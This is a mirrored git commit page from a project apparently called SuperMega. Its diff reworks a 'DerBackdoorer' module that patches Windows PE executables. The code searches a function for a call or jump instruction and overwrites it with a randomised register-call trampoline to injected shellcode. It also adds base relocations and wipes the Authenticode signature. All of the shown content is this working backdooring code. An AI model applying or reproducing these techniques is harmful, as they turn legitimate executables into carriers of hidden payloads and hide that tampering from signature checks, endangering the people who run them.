admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-02 17:27:10 +00:00
Code Issues Packages Projects Releases Wiki Activity

refactor: function hijacker / DerBackdoorer rework

Browse Source
This commit is contained in:
Dobin
2024-04-20 15:09:17 +01:00
parent ab6823c7aa
commit bc6cc4df2d
5 changed files with 144 additions and 286 deletions
Download Patch File Download Diff File Expand all files Collapse all files
pe/derbackdoorer.py
+83 -144
View File
@@ -18,180 +18,119 @@ from model.defs import *
logger = logging.getLogger("DerBackdoorer")
class PeBackdoor:
def __init__(self, superpe: SuperPe, main_shc: bytes, carrier_invoke_style: CarrierInvokeStyle):
class FunctionBackdoorer:
def __init__(self, superpe: SuperPe, main_shc: bytes):
self.superpe: SuperPe = superpe
self.carrier_invoke_style: CarrierInvokeStyle = carrier_invoke_style
self.shellcodeData: bytes = main_shc
self.shellcodeAddr: int = 0
# Working
self.shellcodeOffset: int = 0 # from start of the file
self.shellcodeOffsetRel: int = 0 # from start of the code section
self.shellcodeAddr: int = 0
self.backdoorOffsetRel: int = 0 # from start of the code section
self.pe_data = self.superpe.pe.get_memory_mapped_image()
self.cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64 + capstone.CS_MODE_LITTLE_ENDIAN)
self.ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64 + keystone.KS_MODE_LITTLE_ENDIAN)
self.cs.detail = True
def getExportEntryPoint(self, exportName: str):
dec = lambda x: '???' if x is None else x.decode()
d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]]
self.superpe.pe.parse_data_directories(directories=d)
if self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols == 0:
raise Exception('No DLL exports found!')
def backdoor_function(self, function_addr: int, shellcode_addr: int):
self.shellcodeAddr = shellcode_addr
logger.info("Backdooring function at 0x{:X} (to shellcode 0x{:X})".format(function_addr, shellcode_addr))
exports = [(e.ordinal, dec(e.name)) for e in self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols]
chosen_export = None
for export in exports:
#logger.debug(f'DLL Export: {export[0]} {export[1]}')
if export[1].lower() == exportName.lower():
chosen_export = export
break
#export = exports[0]
#if choose_random:
# export = exports[0]
logger.info("Export: {} {}".format(chosen_export[0], chosen_export[1]))
name = chosen_export[1]
#addr = self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols[export[0]].address
for exp in self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols:
#logger.info("-- {} {}".format(hex(exp.address), exp.name.decode()))
if exp.name.decode() == name:
#print(hex(exp.address), exp.name.decode())
addr = exp.address
return addr
instr = self.find_suitable_instruction_addr(function_addr, 128)
if instr is None:
raise Exception("Couldn't find a suitable instruction to backdoor")
compiled_trampoline, trampoline_reloc_offset = self.get_trampoline(instr)
def backdoor_function(self, function_addr, shellcode_addr):
#imageBase = self.superpe.pe.OPTIONAL_HEADER.ImageBase
#self.shellcodeAddr = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset) + imageBase
# write
self.superpe.pe.set_bytes_at_rva(instr.address, bytes(compiled_trampoline))
cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64 + capstone.CS_MODE_LITTLE_ENDIAN)
ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64 + keystone.KS_MODE_LITTLE_ENDIAN)
cs.detail = True
# relocs
relocs = (
instr.address + trampoline_reloc_offset,
)
pageRva = 4096 * int((instr.address + trampoline_reloc_offset) / 4096)
self.superpe.addImageBaseRelocations(pageRva, relocs)
#if addr == -1:
# ep = self.superpe.get_entrypoint()
# logger.info("--[ BackdoorEntryPoint(): Use Entry Point 0x{:X}".format(ep))
#else:
# ep = addr
# logger.info("--[ BackdoorEntryPoint(): Use Addr 0x{:X}".format(ep))
#ep_ava = ep + self.superpe.pe.OPTIONAL_HEADER.ImageBase
#data = self.superpe.pe.get_memory_mapped_image()[ep:ep+128]
#offset = 0
#logger.debug('Entry Point disasm:')
def find_suitable_instruction_addr(self, startOffset, length, maxDepth = 5):
"""Find a instruction to backdoor. Recursively."""
return self._find_suitable_instruction_addr(startOffset, length, maxDepth, 1)
disasmData = self.superpe.pe.get_memory_mapped_image()
output = self.superpe.disasmBytes(cs, ks, disasmData, function_addr, 128, self.backdoorInstruction)
# store offset... by calculating it first FUCK
section = self.superpe.get_code_section()
self.backdoorOffsetRel = output - section.VirtualAddress
def _find_suitable_instruction_addr(self, startOffset, length, maxDepth, depth):
logger.info("find_suitable_instruction_addr: off: 0x{:X} len:{} depth:{}".format(startOffset, length, depth))
if False:
if output != 0:
logger.debug('Now disasm looks like follows: ')
if depth > maxDepth:
return None
disasmData = self.superpe.pe.get_memory_mapped_image()
self.superpe.disasmBytes(cs, ks, disasmData, output - 32, 32, None, maxDepth = 3)
data = self.pe_data[startOffset:startOffset + length]
logger.debug('\n[>] Inserted backdoor code: ')
for instr in cs.disasm(bytes(self.compiledTrampoline), output):
self.superpe.printInstr(instr, 1)
for instr in self.cs.disasm(data, startOffset):
self.printInstr(instr, depth)
logger.debug('')
self.superpe.disasmBytes(cs, ks, disasmData, output + len(self.compiledTrampoline), 32, None, maxDepth = 3)
# find a call/jmp instruction with an immediate operand
if len(instr.operands) != 1:
continue
operand = instr.operands[0]
if operand.type != capstone.CS_OP_IMM:
continue
# We found one. check it.
logger.info('\t' * depth + f' -> Found OP_IMM: 0x{operand.value.imm:X}')
is_jumpy = instr.mnemonic.lower() in ['jmp', 'je', 'jz', 'jne', 'jnz', 'ja', 'jb', 'jae', 'jbe', 'jg', 'jl', 'jge', 'jle']
is_jumpy |= instr.mnemonic.lower() == 'call'
if not is_jumpy:
continue
# dont take a jump too early
if depth >= 2:
# use this as the backdoor
return instr
else:
logger.error('Did not find suitable candidate for Entry Point branch hijack!')
# follow it deeper
if depth + 1 <= maxDepth:
out = self._find_suitable_instruction_addr(
operand.value.imm, length, maxDepth, depth + 1)
return out
return None
return output
def getBackdoorTrampoline(self, cs, ks, instr):
trampoline = ''
def get_trampoline(self, instr):
addrOffset = -1
if self.superpe.is_64():
registers = ['rax', 'rbx', 'rcx', 'rdx', 'rsi', 'rdi']
else:
# Not really used
registers = ['eax', 'ebx', 'ecx', 'edx', 'esi', 'edi']
if not self.superpe.is_64():
raise Exception("Not 64 bit")
reg = random.choice(['rax', 'rbx', 'rcx', 'rdx', 'rsi', 'rdi']).upper()
full_shellcode_addr = self.shellcodeAddr + self.superpe.pe.OPTIONAL_HEADER.ImageBase
reg = random.choice(registers).upper()
reg2 = random.choice(registers).upper()
while reg2 == reg:
reg2 = random.choice(registers).upper()
enc, count = ks.asm(f'MOV {reg}, 0x{self.shellcodeAddr:X}')
for instr2 in cs.disasm(bytes(enc), 0):
enc, count = self.ks.asm(f'MOV {reg}, 0x{full_shellcode_addr:X}')
for instr2 in self.cs.disasm(bytes(enc), 0):
addrOffset = len(instr2.bytes) - instr2.addr_size
break
found = instr.mnemonic.lower() in ['jmp', 'je', 'jz', 'jne', 'jnz', 'ja', 'jb', 'jae', 'jbe', 'jg', 'jl', 'jge', 'jle']
found |= instr.mnemonic.lower() == 'call'
jump = random.choice([
f'CALL {reg}',
if found:
logger.info(f'---[ Backdooring entry point {instr.mnemonic.upper()} instruction at RVA 0x{instr.address:X} into:')
#
# During my tests I found that CALL reg works stabily all the time, whereas below two gadgets
# are known to crash on seldom occassions.
#
jump = random.choice([
f'CALL {reg}',
#f'JMP {reg}',
#f'PUSH {reg} ; RET',
])
#
# During my tests I found that CALL reg works stabily all the time, whereas below two gadgets
# are known to crash on seldom occassions.
#
#f'JMP {reg}',
#f'PUSH {reg} ; RET',
])
trampoline = f'MOV {reg}, 0x{self.shellcodeAddr:X} ; {jump}'
for ins in trampoline.split(';'):
logger.info(f'\t{ins.strip()}')
return (trampoline, addrOffset)
trampoline_text = f'MOV {reg}, 0x{full_shellcode_addr:X} ; {jump}'
trampoline_compiled, count = self.ks.asm(trampoline_text)
logger.info("--[ Backdooring {} at 0x{:X} with trampoline: {}".format(
instr.mnemonic.upper(), instr.address, trampoline_text))
return trampoline_compiled, addrOffset
def backdoorInstruction(self, cs, ks, disasmData, startOffset, instr, operand, depth):
encoding = b''
count = 0
def printInstr(self, instr, depth):
_bytes = [f'{x:02x}' for x in instr.bytes[:8]]
if len(instr.bytes) < 8:
_bytes.extend([' ',] * (8 - len(instr.bytes)))
if depth < 2:
return 0
instrBytes = ' '.join([f'{x}' for x in _bytes])
logger.info('\t' * 1 + f'[{instr.address:08x}]\t{instrBytes}' + '\t' * depth + f'{instr.mnemonic}\t{instr.op_str}')
(trampoline, addrOffset) = self.getBackdoorTrampoline(cs, ks, instr)
if len(trampoline) > 0:
encoding, count = ks.asm(trampoline)
self.superpe.pe.set_bytes_at_rva(instr.address, bytes(encoding))
relocs = (
instr.address + addrOffset,
)
pageRva = 4096 * int((instr.address + addrOffset) / 4096)
self.superpe.addImageBaseRelocations(pageRva, relocs)
self.trampoline = trampoline
self.compiledTrampoline = encoding
self.compiledTrampolineCount = count
logger.debug('Successfully backdoored entry point with jump/call to shellcode')
return instr.address
return 0
def removeSignature(self):
addr = self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress
size = self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].Size
self.superpe.pe.set_bytes_at_rva(addr, b'\x00' * size)
self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0
self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].Size = 0
logger.info('PE executable Authenticode signature removed.')
return True
pe/superpe.py
+29 -42
View File
@@ -213,6 +213,28 @@ class SuperPe():
i += 1
def getExportEntryPoint(self, exportName: str):
dec = lambda x: '???' if x is None else x.decode()
d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]]
self.pe.parse_data_directories(directories=d)
if self.pe.DIRECTORY_ENTRY_EXPORT.symbols == 0:
raise Exception('No DLL exports found!')
exports = [(e.ordinal, dec(e.name)) for e in self.pe.DIRECTORY_ENTRY_EXPORT.symbols]
chosen_export = None
for export in exports:
if export[1].lower() == exportName.lower():
chosen_export = export
break
logger.debug("Export: {} {}".format(chosen_export[0], chosen_export[1]))
name = chosen_export[1]
for exp in self.pe.DIRECTORY_ENTRY_EXPORT.symbols:
if exp.name.decode() == name:
addr = exp.address
return addr
def get_exports(self) -> List[str]:
"""Return a list of exported functions (names) from the PE file"""
d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]]
@@ -276,47 +298,12 @@ class SuperPe():
self.pe.write(outfile)
## Disassembly / Output
def disasmBytes(self, cs, ks, disasmData, startOffset, length, callback = None, maxDepth = 5):
return self._disasmBytes(cs, ks, disasmData, startOffset, length, callback, maxDepth, 1)
def removeSignature(self):
logger.info('PE executable Authenticode signature remove')
addr = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress
size = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_SECURITY].Size
self.pe.set_bytes_at_rva(addr, b'\x00' * size)
def printInstr(self, instr, depth):
_bytes = [f'{x:02x}' for x in instr.bytes[:8]]
if len(instr.bytes) < 8:
_bytes.extend([' ',] * (8 - len(instr.bytes)))
instrBytes = ' '.join([f'{x}' for x in _bytes])
logger.debug('\t' * 1 + f'[{instr.address:08x}]\t{instrBytes}' + '\t' * depth + f'{instr.mnemonic}\t{instr.op_str}')
def _disasmBytes(self, cs, ks, disasmData, startOffset, length, callback, maxDepth, depth):
if depth > maxDepth:
return 0
data = disasmData[startOffset:startOffset + length]
for instr in cs.disasm(data, startOffset):
self.printInstr(instr, depth)
if len(instr.operands) == 1:
operand = instr.operands[0]
if operand.type == capstone.CS_OP_IMM:
logger.debug('\t' * (depth+1) + f' -> OP_IMM: 0x{operand.value.imm:X}')
logger.debug('')
if callback:
out = callback(cs, ks, disasmData, startOffset, instr, operand, depth)
if out != 0:
return out
if depth + 1 <= maxDepth:
out = self._disasmBytes(cs, ks, disasmData, operand.value.imm, length, callback, maxDepth, depth + 1)
return out
if not callback:
return 1
return 0
self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0
self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_SECURITY].Size = 0